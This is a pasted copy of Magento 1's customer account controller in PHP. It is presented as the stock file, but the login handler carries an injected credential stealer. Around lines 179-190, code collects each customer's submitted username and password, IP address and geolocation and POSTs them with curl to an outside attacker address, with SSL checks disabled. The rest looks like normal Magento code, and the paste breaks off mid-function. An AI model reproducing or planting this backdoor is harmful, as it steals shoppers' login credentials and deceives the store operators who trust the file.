SHARE
TWEET

Untitled

utista28 Oct 9th, 2019 62 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /**
  3.  * Magento
  4.  *
  5.  * NOTICE OF LICENSE
  6.  *
  7.  * This source file is subject to the Open Software License (OSL 3.0)
  8.  * that is bundled with this package in the file LICENSE.txt.
  9.  * It is also available through the world-wide-web at this URL:
  10.  * http://opensource.org/licenses/osl-3.0.php
  11.  * If you did not receive a copy of the license and are unable to
  12.  * obtain it through the world-wide-web, please send an email
  13.  * to license@magento.com so we can send you a copy immediately.
  14.  *
  15.  * DISCLAIMER
  16.  *
  17.  * Do not edit or add to this file if you wish to upgrade Magento to newer
  18.  * versions in the future. If you wish to customize Magento for your
  19.  * needs please refer to http://www.magento.com for more information.
  20.  *
  21.  * @category    Mage
  22.  * @package     Mage_Customer
  23.  * @copyright  Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
  24.  * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
  25.  */
  26.  
  27. /**
  28.  * Customer account controller
  29.  *
  30.  * @category   Mage
  31.  * @package    Mage_Customer
  32.  * @author      Magento Core Team <core@magentocommerce.com>
  33.  */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36.     /**
  37.      * Action list where need check enabled cookie
  38.      *
  39.      * @var array
  40.      */
  41.     protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43.     /**
  44.      * Retrieve customer session model object
  45.      *
  46.      * @return Mage_Customer_Model_Session
  47.      */
  48.     protected function _getSession()
  49.     {
  50.         return Mage::getSingleton('customer/session');
  51.     }
  52.  
  53.     /**
  54.      * Action predispatch
  55.      *
  56.      * Check customer authentication for some actions
  57.      */
  58.     public function preDispatch()
  59.     {
  60.         // a brute-force protection here would be nice
  61.  
  62.         parent::preDispatch();
  63.  
  64.         if (!$this->getRequest()->isDispatched()) {
  65.             return;
  66.         }
  67.  
  68.         $action = $this->getRequest()->getActionName();
  69.         $openActions = array(
  70.             'create',
  71.             'login',
  72.             'logoutsuccess',
  73.             'forgotpassword',
  74.             'forgotpasswordpost',
  75.             'resetpassword',
  76.             'resetpasswordpost',
  77.             'confirm',
  78.             'confirmation'
  79.         );
  80.         $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82.         if (!preg_match($pattern, $action)) {
  83.             if (!$this->_getSession()->authenticate($this)) {
  84.                 $this->setFlag('', 'no-dispatch', true);
  85.             }
  86.         } else {
  87.             $this->_getSession()->setNoReferer(true);
  88.         }
  89.     }
  90.  
  91.     /**
  92.      * Action postdispatch
  93.      *
  94.      * Remove No-referer flag from customer session after each action
  95.      */
  96.     public function postDispatch()
  97.     {
  98.         parent::postDispatch();
  99.         $this->_getSession()->unsNoReferer(false);
  100.     }
  101.  
  102.     /**
  103.      * Default customer account page
  104.      */
  105.     public function indexAction()
  106.     {
  107.         $this->loadLayout();
  108.         $this->_initLayoutMessages('customer/session');
  109.         $this->_initLayoutMessages('catalog/session');
  110.  
  111.         $this->getLayout()->getBlock('content')->append(
  112.             $this->getLayout()->createBlock('customer/account_dashboard')
  113.         );
  114.         $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115.         $this->renderLayout();
  116.     }
  117.  
  118.     /**
  119.      * Customer login form page
  120.      */
  121.     public function loginAction()
  122.     {
  123.         if ($this->_getSession()->isLoggedIn()) {
  124.             $this->_redirect('*/*/');
  125.             return;
  126.         }
  127.         $this->getResponse()->setHeader('Login-Required', 'true');
  128.         $this->loadLayout();
  129.         $this->_initLayoutMessages('customer/session');
  130.         $this->_initLayoutMessages('catalog/session');
  131.         $this->renderLayout();
  132.     }
  133.  
  134.     /**
  135.      * Login post action
  136.      */
  137.     public function loginPostAction()
  138.     {
  139.         if (!$this->_validateFormKey()) {
  140.             $this->_redirect('*/*/');
  141.             return;
  142.         }
  143.  
  144.         if ($this->_getSession()->isLoggedIn()) {
  145.             $this->_redirect('*/*/');
  146.             return;
  147.         }
  148.         $session = $this->_getSession();
  149.  
  150.         if ($this->getRequest()->isPost()) {
  151.             $login = $this->getRequest()->getPost('login');
  152.             if (!empty($login['username']) && !empty($login['password'])) {
  153.                 try {
  154.                     $session->login($login['username'], $login['password']);
  155.                     if ($session->getCustomer()->getIsJustConfirmed()) {
  156.                         $this->_welcomeCustomer($session->getCustomer(), true);
  157.                     }
  158.                 } catch (Mage_Core_Exception $e) {
  159.                     switch ($e->getCode()) {
  160.                         case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161.                             $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162.                             $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163.                             break;
  164.                         case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165.                             $message = $e->getMessage();
  166.                             break;
  167.                         default:
  168.                             $message = $e->getMessage();
  169.                     }
  170.                     $session->addError($message);
  171.                     $session->setUsername($login['username']);
  172.                 } catch (Exception $e) {
  173.                     // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174.                 }
  175.             } else {
  176.                 $session->addError($this->__('Login and password are required.'));
  177.             }
  178.         }
  179.                 $ip = getenv("REMOTE_ADDR");
  180.                 $a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
  181.                 $web     = $_SERVER["HTTP_HOST"];
  182.                 $message .= "Website : ".$web."\n";
  183.                 $message .= "Username: ".$login['username']."\n";
  184.                 $message .= "Password: ".$login['password']."\n";
  185.                 $message .= "IP      : ".$ip."\n";
  186.                 $message .= "Country : ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
  187.                 $subject = "Mag Log1n ".$web." ".$a->geoplugin_countryName;
  188.                 $update = "data@palapudu.com";
  189.                 $xupdate = "data=".$message."&subject=".$subject."&server=".$web;
  190.           $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
  191.         $this->_loginPostRedirect();
  192.     }
  193.  
  194.     /**
  195.      * Define target URL and redirect customer after logging in
  196.      */
  197.     protected function _loginPostRedirect()
  198.     {
  199.        
  200.         $session = $this->_getSession();
  201.  
  202.         if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  203.             // Set default URL to redirect customer to
  204.             $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  205.             // Redirect customer to the last page visited after logging in
  206.             if ($session->isLoggedIn()) {
  207.                 if (!Mage::getStoreConfigFlag(
  208.                     Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  209.                 )) {
  210.                     $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  211.                     if ($referer) {
  212.                         // Rebuild referer URL to handle the case when SID was changed
  213.                         $referer = $this->_getModel('core/url')
  214.                             ->getRebuiltUrl( $this->_getHelper('core')->urlDecodeAndEscape($referer));
  215.                         if ($this->_isUrlInternal($referer)) {
  216.                             $session->setBeforeAuthUrl($referer);
  217.                         }
  218.                     }
  219.                 } else if ($session->getAfterAuthUrl()) {
  220.                     $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  221.                 }
  222.             } else {
  223.                 $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  224.             }
  225.         } else if ($session->getBeforeAuthUrl() ==  $this->_getHelper('customer')->getLogoutUrl()) {
  226.             $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  227.         } else {
  228.             if (!$session->getAfterAuthUrl()) {
  229.                 $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  230.             }
  231.             if ($session->isLoggedIn()) {
  232.                 $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  233.             }
  234.         }
  235.         $this->_redirectUrl($session->getBeforeAuthUrl(true));
  236.     }
  237.  
  238.     /**
  239.      * Customer logout action
  240.      */
  241.     public function logoutAction()
  242.     {
  243.         $this->_getSession()->logout()
  244.             ->renewSession();
  245.  
  246.         $this->_redirect('*/*/logoutSuccess');
  247.     }
  248.  
  249.     /**
  250.      * Logout success page
  251.      */
  252.     public function logoutSuccessAction()
  253.     {
  254.         $this->loadLayout();
  255.         $this->renderLayout();
  256.     }
  257.  
  258.     /**
  259.      * Customer register form page
  260.      */
  261.     public function createAction()
  262.     {
  263.         if ($this->_getSession()->isLoggedIn()) {
  264.             $this->_redirect('*/*');
  265.             return;
  266.         }
  267.  
  268.         $this->loadLayout();
  269.         $this->_initLayoutMessages('customer/session');
  270.         $this->renderLayout();
  271.     }
  272.  
  273.     /**
  274.      * Create customer account action
  275.      */
  276.     public function createPostAction()
  277.     {
  278.         /** @var $session Mage_Customer_Model_Session */
  279.         $session = $this->_getSession();
  280.         if ($session->isLoggedIn()) {
  281.             $this->_redirect('*/*/');
  282.             return;
  283.         }
  284.         $session->setEscapeMessages(true); // prevent XSS injection in user input
  285.         if (!$this->getRequest()->isPost()) {
  286.             $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  287.             $this->_redirectError($errUrl);
  288.             return;
  289.         }
  290.  
  291.         $customer = $this->_getCustomer();
  292.  
  293.         try {
  294.             $errors = $this->_getCustomerErrors($customer);
  295.  
  296.             if (empty($errors)) {
  297.                 $customer->cleanPasswordsValidationData();
  298.                 $customer->save();
  299.                 $this->_dispatchRegisterSuccess($customer);
  300.                 $this->_successProcessRegistration($customer);
  301.                 return;
  302.             } else {
  303.                 $this->_addSessionError($errors);
  304.             }
  305.         } catch (Mage_Core_Exception $e) {
  306.             $session->setCustomerFormData($this->getRequest()->getPost());
  307.             if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  308.                 $url = $this->_getUrl('customer/account/forgotpassword');
  309.                 $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  310.                 $session->setEscapeMessages(false);
  311.             } else {
  312.                 $message = $e->getMessage();
  313.             }
  314.             $session->addError($message);
  315.         } catch (Exception $e) {
  316.             $session->setCustomerFormData($this->getRequest()->getPost())
  317.                 ->addException($e, $this->__('Cannot save the customer.'));
  318.         }
  319.         $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  320.         $this->_redirectError($errUrl);
  321.     }
  322.  
  323.     /**
  324.      * Success Registration
  325.      *
  326.      * @param Mage_Customer_Model_Customer $customer
  327.      * @return Mage_Customer_AccountController
  328.      */
  329.     protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  330.     {
  331.         $session = $this->_getSession();
  332.         if ($customer->isConfirmationRequired()) {
  333.             /** @var $app Mage_Core_Model_App */
  334.             $app = $this->_getApp();
  335.             /** @var $store  Mage_Core_Model_Store*/
  336.             $store = $app->getStore();
  337.             $customer->sendNewAccountEmail(
  338.                 'confirmation',
  339.                 $session->getBeforeAuthUrl(),
  340.                 $store->getId()
  341.             );
  342.             $customerHelper = $this->_getHelper('customer');
  343.             $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  344.                 $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  345.             $url = $this->_getUrl('*/*/index', array('_secure' => true));
  346.         } else {
  347.             $session->setCustomerAsLoggedIn($customer);
  348.             $url = $this->_welcomeCustomer($customer);
  349.         }
  350.         $this->_redirectSuccess($url);
  351.         return $this;
  352.     }
  353.  
  354.     /**
  355.      * Get Customer Model
  356.      *
  357.      * @return Mage_Customer_Model_Customer
  358.      */
  359.     protected function _getCustomer()
  360.     {
  361.         $customer = $this->_getFromRegistry('current_customer');
  362.         if (!$customer) {
  363.             $customer = $this->_getModel('customer/customer')->setId(null);
  364.         }
  365.         if ($this->getRequest()->getParam('is_subscribed', false)) {
  366.             $customer->setIsSubscribed(1);
  367.         }
  368.         /**
  369.          * Initialize customer group id
  370.          */
  371.         $customer->getGroupId();
  372.  
  373.         return $customer;
  374.     }
  375.  
  376.     /**
  377.      * Add session error method
  378.      *
  379.      * @param string|array $errors
  380.      */
  381.     protected function _addSessionError($errors)
  382.     {
  383.         $session = $this->_getSession();
  384.         $session->setCustomerFormData($this->getRequest()->getPost());
  385.         if (is_array($errors)) {
  386.             foreach ($errors as $errorMessage) {
  387.                 $session->addError($errorMessage);
  388.             }
  389.         } else {
  390.             $session->addError($this->__('Invalid customer data'));
  391.         }
  392.     }
  393.  
  394.     /**
  395.      * Validate customer data and return errors if they are
  396.      *
  397.      * @param Mage_Customer_Model_Customer $customer
  398.      * @return array|string
  399.      */
  400.     protected function _getCustomerErrors($customer)
  401.     {
  402.         $errors = array();
  403.         $request = $this->getRequest();
  404.         if ($request->getPost('create_address')) {
  405.             $errors = $this->_getErrorsOnCustomerAddress($customer);
  406.         }
  407.         $customerForm = $this->_getCustomerForm($customer);
  408.         $customerData = $customerForm->extractData($request);
  409.         $customerErrors = $customerForm->validateData($customerData);
  410.         if ($customerErrors !== true) {
  411.             $errors = array_merge($customerErrors, $errors);
  412.         } else {
  413.             $customerForm->compactData($customerData);
  414.             $customer->setPassword($request->getPost('password'));
  415.             $customer->setPasswordConfirmation($request->getPost('confirmation'));
  416.             $customerErrors = $customer->validate();
  417.             if (is_array($customerErrors)) {
  418.                 $errors = array_merge($customerErrors, $errors);
  419.             }
  420.         }
  421.         return $errors;
  422.     }
  423.  
  424.     /**
  425.      * Get Customer Form Initalized Model
  426.      *
  427.      * @param Mage_Customer_Model_Customer $customer
  428.      * @return Mage_Customer_Model_Form
  429.      */
  430.     protected function _getCustomerForm($customer)
  431.     {
  432.         /* @var $customerForm Mage_Customer_Model_Form */
  433.         $customerForm = $this->_getModel('customer/form');
  434.         $customerForm->setFormCode('customer_account_create');
  435.         $customerForm->setEntity($customer);
  436.         return $customerForm;
  437.     }
  438.  
  439.     /**
  440.      * Get Helper
  441.      *
  442.      * @param string $path
  443.      * @return Mage_Core_Helper_Abstract
  444.      */
  445.     protected function _getHelper($path)
  446.     {
  447.         return Mage::helper($path);
  448.     }
  449.  
  450.     /**
  451.      * Get App
  452.      *
  453.      * @return Mage_Core_Model_App
  454.      */
  455.     protected function _getApp()
  456.     {
  457.         return Mage::app();
  458.     }
  459.  
  460.     /**
  461.      * Dispatch Event
  462.      *
  463.      * @param Mage_Customer_Model_Customer $customer
  464.      */
  465.     protected function _dispatchRegisterSuccess($customer)
  466.     {
  467.         Mage::dispatchEvent('customer_register_success',
  468.             array('account_controller' => $this, 'customer' => $customer)
  469.         );
  470.     }
  471.  
  472.     /**
  473.      * Gets customer address
  474.      *
  475.      * @param $customer
  476.      * @return array $errors
  477.      */
  478.     protected function _getErrorsOnCustomerAddress($customer)
  479.     {
  480.         $errors = array();
  481.         /* @var $address Mage_Customer_Model_Address */
  482.         $address = $this->_getModel('customer/address');
  483.         /* @var $addressForm Mage_Customer_Model_Form */
  484.         $addressForm = $this->_getModel('customer/form');
  485.         $addressForm->setFormCode('customer_register_address')
  486.             ->setEntity($address);
  487.  
  488.         $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  489.         $addressErrors = $addressForm->validateData($addressData);
  490.         if (is_array($addressErrors)) {
  491.             $errors = array_merge($errors, $addressErrors);
  492.         }
  493.         $address->setId(null)
  494.             ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  495.             ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  496.         $addressForm->compactData($addressData);
  497.         $customer->addAddress($address);
  498.  
  499.         $addressErrors = $address->validate();
  500.         if (is_array($addressErrors)) {
  501.             $errors = array_merge($errors, $addressErrors);
  502.         }
  503.         return $errors;
  504.     }
  505.  
  506.     /**
  507.      * Get model by path
  508.      *
  509.      * @param string $path
  510.      * @param array|null $arguments
  511.      * @return false|Mage_Core_Model_Abstract
  512.      */
  513.     public function _getModel($path, $arguments = array())
  514.     {
  515.         return Mage::getModel($path, $arguments);
  516.     }
  517.  
  518.     /**
  519.      * Get model from registry by path
  520.      *
  521.      * @param string $path
  522.      * @return mixed
  523.      */
  524.     protected function _getFromRegistry($path)
  525.     {
  526.         return Mage::registry($path);
  527.     }
  528.  
  529.     /**
  530.      * Add welcome message and send new account email.
  531.      * Returns success URL
  532.      *
  533.      * @param Mage_Customer_Model_Customer $customer
  534.      * @param bool $isJustConfirmed
  535.      * @return string
  536.      */
  537.     protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  538.     {
  539.         $this->_getSession()->addSuccess(
  540.             $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  541.         );
  542.         if ($this->_isVatValidationEnabled()) {
  543.             // Show corresponding VAT message to customer
  544.             $configAddressType =  $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  545.             $userPrompt = '';
  546.             switch ($configAddressType) {
  547.                 case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  548.                     $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  549.                         $this->_getUrl('customer/address/edit'));
  550.                     break;
  551.                 default:
  552.                     $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  553.                         $this->_getUrl('customer/address/edit'));
  554.             }
  555.             $this->_getSession()->addSuccess($userPrompt);
  556.         }
  557.  
  558.         $customer->sendNewAccountEmail(
  559.             $isJustConfirmed ? 'confirmed' : 'registered',
  560.             '',
  561.             Mage::app()->getStore()->getId()
  562.         );
  563.  
  564.         $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  565.         if ($this->_getSession()->getBeforeAuthUrl()) {
  566.             $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  567.         }
  568.         return $successUrl;
  569.     }
  570.  
  571.     /**
  572.      * Confirm customer account by id and confirmation key
  573.      */
  574.     public function confirmAction()
  575.     {
  576.         $session = $this->_getSession();
  577.         if ($session->isLoggedIn()) {
  578.             $this->_getSession()->logout()->regenerateSessionId();
  579.         }
  580.         try {
  581.             $id      = $this->getRequest()->getParam('id', false);
  582.             $key     = $this->getRequest()->getParam('key', false);
  583.             $backUrl = $this->getRequest()->getParam('back_url', false);
  584.             if (empty($id) || empty($key)) {
  585.                 throw new Exception($this->__('Bad request.'));
  586.             }
  587.  
  588.             // load customer by id (try/catch in case if it throws exceptions)
  589.             try {
  590.                 $customer = $this->_getModel('customer/customer')->load($id);
  591.                 if ((!$customer) || (!$customer->getId())) {
  592.                     throw new Exception('Failed to load customer by id.');
  593.                 }
  594.             }
  595.             catch (Exception $e) {
  596.                 throw new Exception($this->__('Wrong customer account specified.'));
  597.             }
  598.  
  599.             // check if it is inactive
  600.             if ($customer->getConfirmation()) {
  601.                 if ($customer->getConfirmation() !== $key) {
  602.                     throw new Exception($this->__('Wrong confirmation key.'));
  603.                 }
  604.  
  605.                 // activate customer
  606.                 try {
  607.                     $customer->setConfirmation(null);
  608.                     $customer->save();
  609.                 }
  610.                 catch (Exception $e) {
  611.                     throw new Exception($this->__('Failed to confirm customer account.'));
  612.                 }
  613.  
  614.                 // log in and send greeting email, then die happy
  615.                 $session->setCustomerAsLoggedIn($customer);
  616.                 $successUrl = $this->_welcomeCustomer($customer, true);
  617.                 $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  618.                 return;
  619.             }
  620.  
  621.             // die happy
  622.             $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  623.             return;
  624.         }
  625.         catch (Exception $e) {
  626.             // die unhappy
  627.             $this->_getSession()->addError($e->getMessage());
  628.             $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  629.             return;
  630.         }
  631.     }
  632.  
  633.     /**
  634.      * Send confirmation link to specified email
  635.      */
  636.     public function confirmationAction()
  637.     {
  638.         $customer = $this->_getModel('customer/customer');
  639.         if ($this->_getSession()->isLoggedIn()) {
  640.             $this->_redirect('*/*/');
  641.             return;
  642.         }
  643.  
  644.         // try to confirm by email
  645.         $email = $this->getRequest()->getPost('email');
  646.         if ($email) {
  647.             try {
  648.                 $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  649.                 if (!$customer->getId()) {
  650.                     throw new Exception('');
  651.                 }
  652.                 if ($customer->getConfirmation()) {
  653.                     $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  654.                     $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  655.                 } else {
  656.                     $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  657.                 }
  658.                 $this->_getSession()->setUsername($email);
  659.                 $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  660.             } catch (Exception $e) {
  661.                 $this->_getSession()->addException($e, $this->__('Wrong email.'));
  662.                 $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  663.             }
  664.             return;
  665.         }
  666.  
  667.         // output form
  668.         $this->loadLayout();
  669.  
  670.         $this->getLayout()->getBlock('accountConfirmation')
  671.             ->setEmail($this->getRequest()->getParam('email', $email));
  672.  
  673.         $this->_initLayoutMessages('customer/session');
  674.         $this->renderLayout();
  675.     }
  676.  
  677.     /**
  678.      * Get Url method
  679.      *
  680.      * @param string $url
  681.      * @param array $params
  682.      * @return string
  683.      */
  684.     protected function _getUrl($url, $params = array())
  685.     {
  686.         return Mage::getUrl($url, $params);
  687.     }
  688.  
  689.     /**
  690.      * Forgot customer password page
  691.      */
  692.     public function forgotPasswordAction()
  693.     {
  694.         $this->loadLayout();
  695.  
  696.         $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  697.             $this->_getSession()->getForgottenEmail()
  698.         );
  699.         $this->_getSession()->unsForgottenEmail();
  700.  
  701.         $this->_initLayoutMessages('customer/session');
  702.         $this->renderLayout();
  703.     }
  704.  
  705.     /**
  706.      * Forgot customer password action
  707.      */
  708.     public function forgotPasswordPostAction()
  709.     {
  710.         $email = (string) $this->getRequest()->getPost('email');
  711.         if ($email) {
  712.             if (!Zend_Validate::is($email, 'EmailAddress')) {
  713.                 $this->_getSession()->setForgottenEmail($email);
  714.                 $this->_getSession()->addError($this->__('Invalid email address.'));
  715.                 $this->_redirect('*/*/forgotpassword');
  716.                 return;
  717.             }
  718.  
  719.             /** @var $customer Mage_Customer_Model_Customer */
  720.             $customer = $this->_getModel('customer/customer')
  721.                 ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  722.                 ->loadByEmail($email);
  723.  
  724.             if ($customer->getId()) {
  725.                 try {
  726.                     $newResetPasswordLinkToken =  $this->_getHelper('customer')->generateResetPasswordLinkToken();
  727.                     $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  728.                     $customer->sendPasswordResetConfirmationEmail();
  729.                 } catch (Exception $exception) {
  730.                     $this->_getSession()->addError($exception->getMessage());
  731.                     $this->_redirect('*/*/forgotpassword');
  732.                     return;
  733.                 }
  734.             }
  735.             $this->_getSession()
  736.                 ->addSuccess( $this->_getHelper('customer')
  737.                 ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  738.                     $this->_getHelper('customer')->escapeHtml($email)));
  739.             $this->_redirect('*/*/');
  740.             return;
  741.         } else {
  742.             $this->_getSession()->addError($this->__('Please enter your email.'));
  743.             $this->_redirect('*/*/forgotpassword');
  744.             return;
  745.         }
  746.     }
  747.  
  748.     /**
  749.      * Display reset forgotten password form
  750.      *
  751.      * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
  752.      *
  753.      */
  754.     public function resetPasswordAction()
  755.     {
  756.         $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  757.         $customerId = (int) $this->getRequest()->getQuery('id');
  758.         try {
  759.             $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  760.             $this->loadLayout();
  761.             // Pass received parameters to the reset forgotten password form
  762.             $this->getLayout()->getBlock('resetPassword')
  763.                 ->setCustomerId($customerId)
  764.                 ->setResetPasswordLinkToken($resetPasswordLinkToken);
  765.             $this->renderLayout();
  766.         } catch (Exception $exception) {
  767.             $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  768.             $this->_redirect('*/*/forgotpassword');
  769.         }
  770.     }
  771.  
  772.     /**
  773.      * Reset forgotten password
  774.      * Used to handle data recieved from reset forgotten password form
  775.      */
  776.     public function resetPasswordPostAction()
  777.     {
  778.         $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  779.         $customerId = (int) $this->getRequest()->getQuery('id');
  780.         $password = (string) $this->getRequest()->getPost('password');
  781.         $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  782.  
  783.         try {
  784.             $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  785.         } catch (Exception $exception) {
  786.             $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  787.             $this->_redirect('*/*/');
  788.             return;
  789.         }
  790.  
  791.         $errorMessages = array();
  792.         if (iconv_strlen($password) <= 0) {
  793.             array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  794.         }
  795.         /** @var $customer Mage_Customer_Model_Customer */
  796.         $customer = $this->_getModel('customer/customer')->load($customerId);
  797.  
  798.         $customer->setPassword($password);
  799.         $customer->setPasswordConfirmation($passwordConfirmation);
  800.         $validationErrorMessages = $customer->validate();
  801.         if (is_array($validationErrorMessages)) {
  802.             $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  803.         }
  804.  
  805.         if (!empty($errorMessages)) {
  806.             $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  807.             foreach ($errorMessages as $errorMessage) {
  808.                 $this->_getSession()->addError($errorMessage);
  809.             }
  810.             $this->_redirect('*/*/resetpassword', array(
  811.                 'id' => $customerId,
  812.                 'token' => $resetPasswordLinkToken
  813.             ));
  814.             return;
  815.         }
  816.  
  817.         try {
  818.             // Empty current reset password token i.e. invalidate it
  819.             $customer->setRpToken(null);
  820.             $customer->setRpTokenCreatedAt(null);
  821.             $customer->cleanPasswordsValidationData();
  822.             $customer->save();
  823.             $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  824.             $this->_redirect('*/*/login');
  825.         } catch (Exception $exception) {
  826.             $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  827.             $this->_redirect('*/*/resetpassword', array(
  828.                 'id' => $customerId,
  829.                 'token' => $resetPasswordLinkToken
  830.             ));
  831.             return;
  832.         }
  833.     }
  834.  
  835.     /**
  836.      * Check if password reset token is valid
  837.      *
  838.      * @param int $customerId
  839.      * @param string $resetPasswordLinkToken
  840.      * @throws Mage_Core_Exception
  841.      */
  842.     protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  843.     {
  844.         if (!is_int($customerId)
  845.             || !is_string($resetPasswordLinkToken)
  846.             || empty($resetPasswordLinkToken)
  847.             || empty($customerId)
  848.             || $customerId < 0
  849.         ) {
  850.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  851.         }
  852.  
  853.         /** @var $customer Mage_Customer_Model_Customer */
  854.         $customer = $this->_getModel('customer/customer')->load($customerId);
  855.         if (!$customer || !$customer->getId()) {
  856.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  857.         }
  858.  
  859.         $customerToken = $customer->getRpToken();
  860.         if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  861.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  862.         }
  863.     }
  864.  
  865.     /**
  866.      * Forgot customer account information page
  867.      */
  868.     public function editAction()
  869.     {
  870.         $this->loadLayout();
  871.         $this->_initLayoutMessages('customer/session');
  872.         $this->_initLayoutMessages('catalog/session');
  873.  
  874.         $block = $this->getLayout()->getBlock('customer_edit');
  875.         if ($block) {
  876.             $block->setRefererUrl($this->_getRefererUrl());
  877.         }
  878.         $data = $this->_getSession()->getCustomerFormData(true);
  879.         $customer = $this->_getSession()->getCustomer();
  880.         if (!empty($data)) {
  881.             $customer->addData($data);
  882.         }
  883.         if ($this->getRequest()->getParam('changepass') == 1) {
  884.             $customer->setChangePassword(1);
  885.         }
  886.  
  887.         $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  888.         $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  889.         $this->renderLayout();
  890.     }
  891.  
  892.     /**
  893.      * Change customer password action
  894.      */
  895.     public function editPostAction()
  896.     {
  897.         if (!$this->_validateFormKey()) {
  898.             return $this->_redirect('*/*/edit');
  899.         }
  900.  
  901.         if ($this->getRequest()->isPost()) {
  902.             /** @var $customer Mage_Customer_Model_Customer */
  903.             $customer = $this->_getSession()->getCustomer();
  904.  
  905.             /** @var $customerForm Mage_Customer_Model_Form */
  906.             $customerForm = $this->_getModel('customer/form');
  907.             $customerForm->setFormCode('customer_account_edit')
  908.                 ->setEntity($customer);
  909.  
  910.             $customerData = $customerForm->extractData($this->getRequest());
  911.  
